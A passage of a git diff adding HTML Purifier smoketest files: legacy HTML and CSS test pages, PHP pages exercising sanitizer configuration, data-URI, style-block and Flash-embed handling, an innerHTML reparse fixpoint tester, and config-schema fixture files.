+ +hr[align='right'], +hr[noshade='noshade'], +hr[width='50'], +hr[size='50'], + +img[align='right'], +img[border='3'], +img[hspace='5'], +img[vspace='5'], + +input[align='right'], +legend[align='center'], + +li[type='A'], +li[value='5'], + +ol[compact='compact'], +ol[start='3'], +ol[type='I'], + +p[align='right'], + +pre[width='50'], + +table[align='right'], +table[bgcolor='#0000FF'], + +tr[bgcolor='#0000FF'], + +td[bgcolor='#0000FF'], +td[height='50'], +td[nowrap='nowrap'], +td[width='200'], + +th[bgcolor='#0000FF'], +th[height='50'], +th[nowrap='nowrap'], +th[width='200'], + +ul[compact='compact'], +ul[type='square'], + +.insert-declarations-above + {background:#008000; color:#FFF; font-weight:bold;} + +font {background:#BFB;} +u {border:1px solid #000;} +hr {height:1em;} +hr[size='50'] {height:50px;} +img[border='3'] {border: 3px solid #000;} +li[type='a'], li[value='5'] {color:#DDD;} + +/* vim: et sw=4 sts=4 */ diff --git a/lib/htmlpurifier/smoketests/basic/legacy.html b/lib/htmlpurifier/smoketests/basic/legacy.html new file mode 100644 index 000000000..0ff1c7b52 --- /dev/null +++ b/lib/htmlpurifier/smoketests/basic/legacy.html @@ -0,0 +1,127 @@ +<?xml version="1.0" encoding="UTF-8" ?> +<!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> +<head> + <title>HTML Purifier Legacy Smoketest Test Data</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <link rel="stylesheet" href="legacy.css" type="text/css" /> +</head> +<body> + +<h1>HTML Purifier Legacy Smoketest Test Data</h1> + +<p>This is the legacy smoketest.</p> + +<h2>Elements</h2> + +<div> +<div> + <basefont color="green" face="Arial" size="6" id="basefont" /> + basefont: Green, Arial, size 6 text (IE-only) +</div> + +<center>center</center> + +<dir compact="compact"> + <li>dir</li> +</dir> + +<font color="green" face="Arial" size="6">font: Green, Arial, size 6 text</font> + +isindex: +<isindex prompt="Foo" /> + +<menu compact="compact"> + <li>menu</li> +</menu> + +<s>s</s> <strike>strike</strike> <u>u</u> +</div> + +<h2>Attributes</h2> + +<div> +<!-- body --> + +<div style="font-size:42pt; float:left;">*</div> +<br clear="left" /> +<p>br@clear (asterisk is up)</p> + +<table> + <caption align="bottom">caption@align</caption> + <tr><td>Cell</td></tr> +</table> + +<div align="center">div@center</div> + +<dl compact="compact"> + <dt>dl@compact</dt> +</dl> + +<h1 align="right">h1</h1> +<h2 align="right">h2</h2> +<h3 align="right">h3</h3> +<h4 align="right">h4</h4> +<h5 align="right">h5</h5> +<h6 align="right">h6</h6> + +hr@align +<hr align="right" width="50" /> +hr@noshade +<hr noshade="noshade" /> +hr@width +<hr width="50" /> +hr@size +<hr size="50" /> + +<img src="" alt="img@align" align="right" /> | +<img src="" alt="img@border" border="3" /> | +<img src="" alt="img@hspace" hspace="5" /> | +<img src="" alt="img@vspace" vspace="5" /> + +<!-- needs context --> +<input align="right" /> +<legend align="center">Legend</legend> + +<ol> + <li type="A">li@type (ensure that it's a capital A)</li> + <li value="5">li@value</li> +</ol> + +<ol compact="compact"><li>ol@compact</li></ol> +<ol start="3"><li>ol@start</li></ol> +<ol type="I"><li>ol@type</li></ol> + +<p align="right">p@align</p> + +<pre width="50">pre@width</pre> + +<script language="JavaScript">document.writeln('script');</script> + +<table align="right"><tr><td>table@align</td></tr></table> +<table bgcolor="#0000FF"><tr><td>table@bgcolor</td></tr></table> + +<table><tr bgcolor="#0000FF"><td>tr@bgcolor</td></tr></table> + +<table><tr><td bgcolor="#0000FF">td@bgcolor</td></tr></table> +<table><tr><td height="50">td@height</td></tr></table> +<table><tr><td nowrap="nowrap">td@nowrap</td></tr></table> +<table><tr><td width="200">td@width</td></tr></table> + +<table><tr><th bgcolor="#0000FF">th@bgcolor</th></tr></table> +<table><tr><th height="50">th@height</th></tr></table> +<table><tr><th nowrap="nowrap">th@nowrap</th></tr></table> +<table><tr><th width="200">th@width</th></tr></table> + +<ul compact="compact"><li>ul@compact</li></ul> +<ul type="square"><li>ul@square</li></ul> + +</div> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/smoketests/cacheConfig.php b/lib/htmlpurifier/smoketests/cacheConfig.php new file mode 100644 index 000000000..2d4ffdda3 --- /dev/null +++ b/lib/htmlpurifier/smoketests/cacheConfig.php @@ -0,0 +1,15 @@ +<?php + +require_once 'common.php'; + +$config = HTMLPurifier_Config::createDefault(); +$config->set('HTML.Doctype', 'HTML 4.01 Strict'); +$config->set('HTML.Allowed', 'b,a[href],br'); +$config->set('CSS.AllowTricky', true); +$config->set('URI.Disable', true); +$serial = $config->serialize(); + +$result = unserialize($serial); +$purifier = new HTMLPurifier($result); +echo htmlspecialchars($purifier->purify('<b>Bold</b><br><i><a href="http://google.com">no</a> formatting</i>')); + diff --git a/lib/htmlpurifier/smoketests/common.php b/lib/htmlpurifier/smoketests/common.php new file mode 100644 index 000000000..c4e5eb388 --- /dev/null +++ b/lib/htmlpurifier/smoketests/common.php @@ -0,0 +1,37 @@ +<?php + +header('Content-type: text/html; charset=UTF-8'); + +if (!isset($_GET['standalone'])) { + require_once '../library/HTMLPurifier.auto.php'; +} else { + require_once '../library/HTMLPurifier.standalone.php'; +} +error_reporting(E_ALL); + +function escapeHTML($string) { + $string = HTMLPurifier_Encoder::cleanUTF8($string); + $string = htmlspecialchars($string, ENT_COMPAT, 'UTF-8'); + return $string; +} + +if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { + function fix_magic_quotes(&$array) { + foreach ($array as $k => $val) { + if (!is_array($val)) { + $array[$k] = stripslashes($val); + } else { + fix_magic_quotes($array[$k]); + } + } + } + + fix_magic_quotes($_GET); + fix_magic_quotes($_POST); + fix_magic_quotes($_COOKIE); + fix_magic_quotes($_REQUEST); + fix_magic_quotes($_ENV); + fix_magic_quotes($_SERVER); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/configForm.php b/lib/htmlpurifier/smoketests/configForm.php new file mode 100644 index 000000000..90e80ac56 --- /dev/null +++ b/lib/htmlpurifier/smoketests/configForm.php @@ -0,0 +1,77 @@ +<?php + +require_once 'common.php'; + +// Setup environment +require_once '../extras/HTMLPurifierExtras.auto.php'; +$interchange = HTMLPurifier_ConfigSchema_InterchangeBuilder::buildFromDirectory('test-schema/'); +$interchange->validate(); + +if (isset($_GET['doc'])) { + + // Hijack page generation to supply documentation + + if (file_exists('test-schema.html') && !isset($_GET['purge'])) { + echo file_get_contents('test-schema.html'); + exit; + } + + $style = 'plain'; + $configdoc_xml = 'test-schema.xml'; + + $xml_builder = new HTMLPurifier_ConfigSchema_Builder_Xml(); + $xml_builder->openURI($configdoc_xml); + $xml_builder->build($interchange); + unset($xml_builder); // free handle + + $xslt = new ConfigDoc_HTMLXSLTProcessor(); + $xslt->importStylesheet("../configdoc/styles/$style.xsl"); + $xslt->setParameters(array( + 'css' => '../configdoc/styles/plain.css', + )); + $html = $xslt->transformToHTML($configdoc_xml); + + unlink('test-schema.xml'); + file_put_contents('test-schema.html', $html); + echo $html; + + exit; +} + +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html> +<head> + <title>HTML Purifier Config Form Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <link rel="stylesheet" href="../library/HTMLPurifier/Printer/ConfigForm.css" type="text/css" /> + <script defer="defer" type="text/javascript" src="../library/HTMLPurifier/Printer/ConfigForm.js"></script> +</head> +<body> +<h1>HTML Purifier Config Form Smoketest</h1> +<p>This file outputs the configuration form for every single type +of directive possible.</p> +<form id="htmlpurifier-config" name="htmlpurifier-config" method="get" action="" +style="float:right;"> +<?php + +$schema_builder = new HTMLPurifier_ConfigSchema_Builder_ConfigSchema(); +$schema = $schema_builder->build($interchange); + +$config = HTMLPurifier_Config::loadArrayFromForm($_GET, 'config', true, true, $schema); +$printer = new HTMLPurifier_Printer_ConfigForm('config', '?doc#%s'); +echo $printer->render(array(HTMLPurifier_Config::createDefault(), $config)); + +?> +</form> +<pre> +<?php +echo htmlspecialchars(var_export($config->getAll(), true)); +?> +</pre> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/dataScheme.php b/lib/htmlpurifier/smoketests/dataScheme.php new file mode 100644 index 000000000..7c0bbdc36 --- /dev/null +++ b/lib/htmlpurifier/smoketests/dataScheme.php @@ -0,0 +1,37 @@ +<?php + +require_once 'common.php'; + +echo '<?xml version="1.0" encoding="UTF-8" ?>'; +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head> + <title>HTML Purifier data Scheme Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +</head> +<body> +<h1>HTML Purifier data Scheme Smoketest</h1> +<?php + +$string = '<img src="data:image/png;base64, +iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAABGdBTUEAALGP +C/xhBQAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9YGARc5KB0XV+IA +AAAddEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIFRoZSBHSU1Q72QlbgAAAF1J +REFUGNO9zL0NglAAxPEfdLTs4BZM4DIO4C7OwQg2JoQ9LE1exdlYvBBeZ7jq +ch9//q1uH4TLzw4d6+ErXMMcXuHWxId3KOETnnXXV6MJpcq2MLaI97CER3N0 +vr4MkhoXe0rZigAAAABJRU5ErkJggg==" alt="Red dot" />'; + +$purifier = new HTMLPurifier(array('URI.AllowedSchemes' => 'data')); + +?> +<div><?php +echo $purifier->purify($string); +?></div> + +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/extractStyleBlocks.php b/lib/htmlpurifier/smoketests/extractStyleBlocks.php new file mode 100644 index 000000000..bb330b5f2 --- /dev/null +++ b/lib/htmlpurifier/smoketests/extractStyleBlocks.php @@ -0,0 +1,73 @@ +<?php + +require_once 'common.php'; +require_once 'HTMLPurifier/Filter/ExtractStyleBlocks.php'; + +// need CSSTidy location +$csstidy_location = false; +if (file_exists('../conf/test-settings.php')) include '../conf/test-settings.php'; +if (file_exists('../test-settings.php')) include '../test-settings.php'; + +if (!$csstidy_location) { +?> +Error: <a href="http://csstidy.sourceforge.net/">CSSTidy</a> library not +found, please install and configure <code>test-settings.php</code> +accordingly. +<?php + exit; +} + +require_once $csstidy_location . 'class.csstidy.php'; +require_once $csstidy_location . 'class.csstidy_print.php'; + +$purifier = new HTMLPurifier(array( + 'Filter.ExtractStyleBlocks' => true, +)); + +$html = isset($_POST['html']) ? $_POST['html'] : ''; +$purified_html = $purifier->purify($html); + +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html> +<head> + <title>Extract Style Blocks - HTML Purifier Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<?php + +// generate style blocks +foreach ($purifier->context->get('StyleBlocks') as $style) { +?><style type="text/css"> +<!--/*--><![CDATA[/*><!--*/ +<?php echo $style; ?> + +/*]]>*/--> +</style> +<?php +} + +?> +</head> +<body> +<h1>Extract Style Blocks</h1> +<p> + This smoketest allows users to specify global style sheets for the + document, allowing for interesting techniques and compact markup + that wouldn't normally be possible, using the ExtractStyleBlocks filter. +</p> +<p> + User submitted content: +</p> +<div style="border: 1px solid #CCC; margin: 1em; padding: 1em;"> + <?php echo $purified_html ?> +</div> +<form action="" method="post"> + <textarea cols="100" rows="20" name="html"><?php echo escapeHTML($html) ?></textarea> + <input type="submit" value="Submit" /> +</form> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/img.png b/lib/htmlpurifier/smoketests/img.png Binary files differnew file mode 100644 index 000000000..a755bcb5e --- /dev/null +++ b/lib/htmlpurifier/smoketests/img.png diff --git a/lib/htmlpurifier/smoketests/innerHTML.html b/lib/htmlpurifier/smoketests/innerHTML.html new file mode 100644 index 000000000..0b840f182 --- /dev/null +++ b/lib/htmlpurifier/smoketests/innerHTML.html @@ -0,0 +1,33 @@ +<html> +<head> + <title>innerHTML smoketest</title> +</head> +<body> +<!-- + +What we're going to do is use JavaScript to calculate +fixpoints of innerHTML parse and reparsing. We start with +an input value, encoded in a JavaScript string. + +x.innerHTML = input + +We then snapshot the DOM state of x, and then perform the +iteration: + +intermediate = x.innerHTML +x.innerHTML = intermediate + +What inputs are we going to test? + +We will generate using the following alphabet: + + a01~!@#$%^&*()_+`-=[]\{}|;':",./<>? (and <space>) + + + +--> +<textarea id="out" style="width:100%;height:100%;"></textarea> +<div id="testContainer" style="display:none"></div> +<script src="innerHTML.js" type="text/javascript"></script> +</body> +</html> diff --git a/lib/htmlpurifier/smoketests/innerHTML.js b/lib/htmlpurifier/smoketests/innerHTML.js new file mode 100644 index 000000000..74ccbb688 --- /dev/null +++ b/lib/htmlpurifier/smoketests/innerHTML.js @@ -0,0 +1,51 @@ +var alphabet = 'a!`=[]\\;\':"/<> &'; + +var out = document.getElementById('out'); +var testContainer = document.getElementById('testContainer'); + +function print(s) { + out.value += s + "\n"; +} + +function testImage() { + return testContainer.firstChild; +} + +function test(input) { + var count = 0; + var oldInput, newInput; + testContainer.innerHTML = "<img />"; + testImage().setAttribute("alt", input); + print("------"); + print("Test input: " + input); + do { + oldInput = testImage().getAttribute("alt"); + var intermediate = testContainer.innerHTML; + print("Render: " + intermediate); + testContainer.innerHTML = intermediate; + if (testImage() == null) { + print("Image disappeared..."); + break; + } + newInput = testImage().getAttribute("alt"); + print("New value: " + newInput); + count++; + } while (count < 5 && newInput != oldInput); + if (count == 5) { + print("Failed to achieve fixpoint"); + } + testContainer.innerHTML = ""; +} + +print("Go!"); + +test("`` "); +test("'' "); + +for (var i = 0; i < alphabet.length; i++) { + for (var j = 0; j < alphabet.length; j++) { + test(alphabet.charAt(i) + alphabet.charAt(j)); + } +} + +// document.getElementById('out').textContent = alphabet; diff --git a/lib/htmlpurifier/smoketests/preserveYouTube.php b/lib/htmlpurifier/smoketests/preserveYouTube.php new file mode 100644 index 000000000..1dfa85cb6 --- /dev/null +++ b/lib/htmlpurifier/smoketests/preserveYouTube.php @@ -0,0 +1,72 @@ +<?php + +require_once 'common.php'; + +echo '<?xml version="1.0" encoding="UTF-8" ?>'; +?><!DOCTYPE html + PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head> + <title>HTML Purifier Preserve YouTube Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +</head> +<body> +<h1>HTML Purifier Preserve YouTube Smoketest</h1> +<?php + +$string = '<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/BdU--T8rLns"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/BdU--T8rLns" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed></object> + +<object width="416" height="337"><param name="movie" value="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc="></param><embed src="http://www.youtube.com/cp/vjVQa1PpcFNbP_fag8PvopkXZyiXyT0J8U47lw7x5Fc=" type="application/x-shockwave-flash" width="416" height="337"></embed></object> + +<object width="640" height="385"><param name="movie" value="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/uNxBeJNyAqA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="640" height="385"></embed></object> + +<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="385" width="480"><param name="width" value="480" /><param name="height" value="385" /><param name="src" value="http://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" /><embed height="385" src="http://www.youtube.com/p/E37ADDDFCA0FD050&hl=en" type="application/x-shockwave-flash" width="480"></embed></object> + +<object + classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" + id="ooyalaPlayer_229z0_gbps1mrs" width="630" height="354" + codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param + name="movie" value="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" + /><param name="bgcolor" value="#000000" /><param + name="allowScriptAccess" value="always" /><param + name="allowFullScreen" value="true" /><param name="flashvars" + value="embedType=noscriptObjectTag&embedCode=pteGRrMTpcKMyQ052c8NwYZ5M5FdSV3j" + /><embed src="http://player.ooyala.com/player.swf?embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za&version=2" + bgcolor="#000000" width="630" height="354" + name="ooyalaPlayer_229z0_gbps1mrs" align="middle" play="true" + loop="false" allowscriptaccess="always" allowfullscreen="true" + type="application/x-shockwave-flash" + flashvars="&embedCode=FpZnZwMTo1wqBF-ed2__OUBb3V4HR6za" + pluginspage="http://www.adobe.com/go/getflashplayer"></embed></object> +'; + +$regular_purifier = new HTMLPurifier(); + +$safeobject_purifier = new HTMLPurifier(array( + 'HTML.SafeObject' => true, + 'Output.FlashCompat' => true, +)); + +?> +<h2>Unpurified</h2> +<p><a href="?break">Click here to see the unpurified version (breaks validation).</a></p> +<div><?php +if (isset($_GET['break'])) echo $string; +?></div> + +<h2>Without YouTube exception</h2> +<div><?php +echo $regular_purifier->purify($string); +?></div> + +<h2>With SafeObject exception and flash compatibility</h2> +<div><?php +echo $safeobject_purifier->purify($string); +?></div> + +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/printDefinition.php b/lib/htmlpurifier/smoketests/printDefinition.php new file mode 100644 index 000000000..201a07a1a --- /dev/null +++ b/lib/htmlpurifier/smoketests/printDefinition.php @@ -0,0 +1,119 @@ +<?php + +require_once 'common.php'; // load library + +require_once 'HTMLPurifier/Printer/HTMLDefinition.php'; +require_once 'HTMLPurifier/Printer/CSSDefinition.php'; +require_once 'HTMLPurifier/Printer/ConfigForm.php'; + +$config = HTMLPurifier_Config::loadArrayFromForm($_GET, 'config', 'HTML'); + +// you can do custom configuration! +if (file_exists('printDefinition.settings.php')) { + include 'printDefinition.settings.php'; +} + +$gen_config = HTMLPurifier_Config::createDefault(); +$printer_html_definition = new HTMLPurifier_Printer_HTMLDefinition(); +$printer_html_definition->prepareGenerator($gen_config); +$printer_css_definition = new HTMLPurifier_Printer_CSSDefinition(); +$printer_css_definition->prepareGenerator($gen_config); + +$printer_config_form = new HTMLPurifier_Printer_ConfigForm( + 'config', + 'http://htmlpurifier.org/live/configdoc/plain.html#%s' +); + +echo '<?xml version="1.0" encoding="UTF-8" ?>'; + +?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> +<head> + <title>HTML Purifier Printer Smoketest</title> + <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> + <style type="text/css"> + .hp-config {margin-left:auto; margin-right:auto;} + .HTMLPurifier_Printer table {border-collapse:collapse; + border:1px solid #000; width:600px; + margin:1em auto;font-family:sans-serif;font-size:75%;} + .HTMLPurifier_Printer td, .HTMLPurifier_Printer th {padding:3px; + border:1px solid #000;background:#CCC; vertical-align: baseline;} + .HTMLPurifier_Printer th {text-align:left;background:#CCF;width:20%;} + .HTMLPurifier_Printer caption {font-size:1.5em; font-weight:bold;} + .HTMLPurifier_Printer .heavy {background:#99C;text-align:center;} + .HTMLPurifier_Printer .unsafe {background:#C99;} + dt {font-weight:bold;} + </style> + <link rel="stylesheet" href="../library/HTMLPurifier/Printer/ConfigForm.css" type="text/css" /> + <script defer="defer" type="text/javascript" src="../library/HTMLPurifier/Printer/ConfigForm.js"></script> +</head> +<body> + +<h1>HTML Purifier Printer Smoketest</h1> + +<p>HTML Purifier claims to have a robust yet permissive whitelist: this +page will allow you to see precisely what HTML Purifier's internal +whitelist is. You can +also twiddle with the configuration settings to see how a directive +influences the internal workings of the definition objects.</p> + +<h2>Modify configuration</h2> + +<p>You can specify an array by typing in a comma-separated +list of items, HTML Purifier will take care of the rest (including +transformation into a real array list or a lookup table).</p> + +<form method="get" action="" name="hp-configform"> +<?php + echo $printer_config_form->render($config, 'HTML'); +?> +<p>* Some configuration directives make a distinction between an empty +variable and a null variable. A whitelist, for example, will take an +empty array as meaning <em>no</em> allowed elements, while checking +Null/Disabled will mean that user whitelisting functionality is disabled.</p> +</form> + +<h2>Definitions</h2> + +<dl> + <dt>Parent of Fragment</dt> + <dd>HTML that HTML Purifier does not live in a void: when it's + output, it has to be placed in another element by means of + something like <code><element> <?php echo $html + ?> </element></code>. The parent in this example + is <code>element</code>.</dd> + <dt>Strict mode</dt> + <dd>Whether or not HTML Purifier's output is Transitional or + Strict compliant. Non-strict mode still actually a little strict + and converts many deprecated elements.</dd> + <dt>#PCDATA</dt> + <dd>Literally <strong>Parsed Character Data</strong>, it is regular + text. Tags like <code>ul</code> don't allow text in them, so + #PCDATA is missing.</dd> + <dt>Tag transform</dt> + <dd>A tag transform will change one tag to another. Example: <code>font</code> + turns into a <code>span</code> tag with appropriate CSS.</dd> + <dt>Attr Transform</dt> + <dd>An attribute transform changes a group of attributes based on one + another. Currently, only <code>lang</code> and <code>xml:lang</code> + use this hook, to synchronize each other's values. Pre/Post indicates + whether or not the transform is done before/after validation.</dd> + <dt>Excludes</dt> + <dd>Tags that an element excludes are excluded for all descendants of + that element, and not just the children of them.</dd> + <dt>Name(Param1, Param2)</dt> + <dd>Represents an internal data-structure. You'll have to check out + the corresponding classes in HTML Purifier to find out more.</dd> +</dl> + +<h2>HTMLDefinition</h2> +<?php echo $printer_html_definition->render($config) ?> +<h2>CSSDefinition</h2> +<?php echo $printer_css_definition->render($config) ?> +</body> +</html> +<?php + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Directive.Allowed.txt b/lib/htmlpurifier/smoketests/test-schema/Directive.Allowed.txt new file mode 100644 index 000000000..2145276e3 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Directive.Allowed.txt @@ -0,0 +1,6 @@ +Directive.Allowed +TYPE: string +DEFAULT: 'apple' +ALLOWED: 'apple', 'orange', 'pear', 'peach', 'mango' +DESCRIPTION: This directive has a constrained set of allowed values. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Directive.Deprecated.txt b/lib/htmlpurifier/smoketests/test-schema/Directive.Deprecated.txt new file mode 100644 index 000000000..ea1820fbb --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Directive.Deprecated.txt @@ -0,0 +1,7 @@ +Directive.Deprecated +TYPE: int +DEFAULT: 0 +DESCRIPTION: This is a deprecated directive that shouldn't show up on the form. +DEPRECATED-VERSION: 1.0.0 +DEPRECATED-USE: Directive.Allowed +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Directive.txt b/lib/htmlpurifier/smoketests/test-schema/Directive.txt new file mode 100644 index 000000000..f59400c33 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Directive.txt @@ -0,0 +1,3 @@ +Directive +DESCRIPTION: Other custom options with directives. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.bool.txt b/lib/htmlpurifier/smoketests/test-schema/Type.bool.txt new file mode 100644 index 000000000..6d446ca08 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.bool.txt @@ -0,0 +1,5 @@ +Type.bool +TYPE: bool +DEFAULT: false +DESCRIPTION: The boolean type is true or false. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.float.txt b/lib/htmlpurifier/smoketests/test-schema/Type.float.txt new file mode 100644 index 000000000..e24ed0161 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.float.txt @@ -0,0 +1,5 @@ +Type.float +TYPE: float +DEFAULT: 3.1415 +DESCRIPTION: The float type is a floating point number. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.hash.txt b/lib/htmlpurifier/smoketests/test-schema/Type.hash.txt new file mode 100644 index 000000000..262d49e05 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.hash.txt @@ -0,0 +1,5 @@ +Type.hash +TYPE: hash +DEFAULT: array('key1' => 'val1', 'key2' => 'val2') +DESCRIPTION: The hash type is an associative array of string keys and string values. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.int.txt b/lib/htmlpurifier/smoketests/test-schema/Type.int.txt new file mode 100644 index 000000000..157df3f3e --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.int.txt @@ -0,0 +1,5 @@ +Type.int +TYPE: int +DEFAULT: 23 +DESCRIPTION: The int type is an signed integer. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.istring.txt b/lib/htmlpurifier/smoketests/test-schema/Type.istring.txt new file mode 100644 index 000000000..dfd43aa48 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.istring.txt @@ -0,0 +1,5 @@ +Type.istring +TYPE: istring +DEFAULT: 'case insensitive' +DESCRIPTION: The istring type is short (no newlines), must be ASCII and is case-insensitive. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.itext.txt b/lib/htmlpurifier/smoketests/test-schema/Type.itext.txt new file mode 100644 index 000000000..97140dea8 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.itext.txt @@ -0,0 +1,5 @@ +Type.itext +TYPE: itext +DEFAULT: "case\ninsensitive\nand\npossibly\nquite\nlong" +DESCRIPTION: The text type has newlines, must be ASCII and is case-insensitive. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.list.txt b/lib/htmlpurifier/smoketests/test-schema/Type.list.txt new file mode 100644 index 000000000..55497fcdf --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.list.txt @@ -0,0 +1,5 @@ +Type.list +TYPE: list +DEFAULT: array('item1', 'item2') +DESCRIPTION: The list type is a numerically indexed array of strings. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.lookup.txt b/lib/htmlpurifier/smoketests/test-schema/Type.lookup.txt new file mode 100644 index 000000000..b2479912f --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.lookup.txt @@ -0,0 +1,5 @@ +Type.lookup +TYPE: lookup +DEFAULT: array('key1' => true, 'key2' => true) +DESCRIPTION: The lookup type acts just like list, except its elements are unique and are checked with <code>isset($var[$key])</code>. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.mixed.txt b/lib/htmlpurifier/smoketests/test-schema/Type.mixed.txt new file mode 100644 index 000000000..8bc14bbe6 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.mixed.txt @@ -0,0 +1,5 @@ +Type.mixed +TYPE: mixed +DEFAULT: new stdclass() +DESCRIPTION: The mixed type allows any type, and is not form-editable. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.nullbool.txt b/lib/htmlpurifier/smoketests/test-schema/Type.nullbool.txt new file mode 100644 index 000000000..d3d756fc6 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.nullbool.txt @@ -0,0 +1,7 @@ +Type.nullbool +TYPE: bool/null +DEFAULT: null +--DESCRIPTION-- +Null booleans need to be treated a little specially. See %Type.nullstring +for information on what the null flag does. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.nullstring.txt b/lib/htmlpurifier/smoketests/test-schema/Type.nullstring.txt new file mode 100644 index 000000000..4db33235d --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.nullstring.txt @@ -0,0 +1,9 @@ +Type.nullstring +TYPE: string/null +DEFAULT: null +--DESCRIPTION-- +The null type is not a type, but a flag that can be added to any type +making null a valid value for that entry. It's useful for saying, "Let +the software pick the value for me," or "Don't use this element" when +false has a special meaning. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.string.txt b/lib/htmlpurifier/smoketests/test-schema/Type.string.txt new file mode 100644 index 000000000..4cde40907 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.string.txt @@ -0,0 +1,5 @@ +Type.string +TYPE: string +DEFAULT: 'Case sensitive' +DESCRIPTION: The string type is short (no newlines) and case-sensitive. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/smoketests/test-schema/Type.text.txt b/lib/htmlpurifier/smoketests/test-schema/Type.text.txt new file mode 100644 index 000000000..5fca4d567 --- /dev/null +++ b/lib/htmlpurifier/smoketests/test-schema/Type.text.txt @@ -0,0 +1,5 @@ +Type.text 